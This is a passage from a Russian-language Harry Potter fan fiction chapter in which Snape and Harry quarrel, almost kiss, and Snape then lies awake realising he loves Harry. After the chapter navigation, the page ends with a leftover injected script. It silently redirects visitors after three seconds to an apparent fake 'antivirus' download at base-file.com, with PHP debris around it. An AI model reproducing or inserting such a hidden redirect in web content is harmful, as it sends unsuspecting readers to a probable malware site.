– Ты не понимаешь, когда нужно остановиться. Этим только вредишь себе, но тебе нужно оставаться героем хоть в чьих-то глазах, потому что только так ты можешь самоутвердиться. Ты спасаешь других, потому что не в силах спасти себя.

– Ха! Какая проницательность, Северус, но я что-то не слышал твоих насмешек, когда согласился спасти тебя на этой неделе.

– И главное. Почему ты просто не сказал мне «нет»? Не бросил меня? Разве я заслужил твою помощь? Мерлинова борода, Гарри, ты пропустил праздник, с друзьями, невестой,  с твоей семьей, чтобы  попасться в ловушку в этом старом доме, со мной и моей властной теткой. Потому что ты не  можешь отказать в помощи никому, включая меня.  Тебе не кажется, что это немного неправильно?

– Сволочь… – щеки Гарри теперь розовели не только от холода, но  и от гнева.

– Люди просто пользуются тобой, Поттер.

– Это не так… им просто нужна помощь. 

– Не вижу никакой разницы. 

– Ты очень несчастный человек. Ты ведь не способен понять желание бескорыстно помочь кому-то, да?

– А ты действительно настолько жесток, что не способен понять, что сначала было бы неплохо подумать о себе?

Глаза Гарри яростно вспыхнули, рука потянулась к карману, где обычно лежала палочка.

– Отлично, теперь наш маленький герой демонстрирует характер? Может, наконец, тебя проняло? Хмм, хочешь проклясть меня? Или вспомнишь свои маггловские привычки и  ударишь? – безжалостно продолжал Северус, заметив, как Гарри сжал кулаки.

Мускулы Гарри напряглись, дыхание стало неровным, выдавая гнев. Великолепные изумрудные глаза потемнели, когда он вновь посмотрел на Северуса и прорычал:

– Нет, я хочу заставить тебя кричать от удовольствия.

Северус замер.

Что ж, это, конечно, немного поумерило его гневный  пыл.

 

С совершенно диким выражением Поттер шагнул к нему, положил руки на плечи и рывком притянул более высокого мужчину к себе. Полные губы слегка приоткрылись…  когда скрип открывающейся двери заставил их подскочить.

Клара высунула голову наружу:

– Вы, два кретина, что стоите на холоде? Немедленно в дом!

Гарри пропустил Северуса вперед и пробормотал:

– Сам не знаю, убить её или поблагодарить. 

– Это, действительно, было так необходимо? – бросил Северус, проходя мимо тетушки  в дом.

– Я лишь волновалась о твоем здоровье! Не хочу, чтобы ты подхватил пневмонию. Мог бы и спасибо сказать.

Спасибо, тебе… – пробормотал Снейп.

– Всегда, пожалуйста, – раздался быстрый ответ. – Насчет ужина…

 

Пять часов спустя, Северус смотрел на спящего Гарри.

И не хотел, что бы подобное повторилось.

 

Он наблюдал за мечущимся на сбитой постели Поттером. Молодой человек сражался во сне с демонами, вздрагивая всем телом и зовя по именам всех своих друзей, членов Ордена Феникса и даже Северуса.

Северусу хотелось разбудить мальчика и избавить от кошмара. Он хотел защитить Гарри. От этой мысли на сердце разлилось странное тепло. И это вызвало еще большую тревогу.

Проклятые чувства! Кому они нужны? Только не ему...

Любовь? Северус застонал и натянул на голову подушку, чтобы заглушить раздающиеся со второй кровати стоны.

Будь все проклято

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>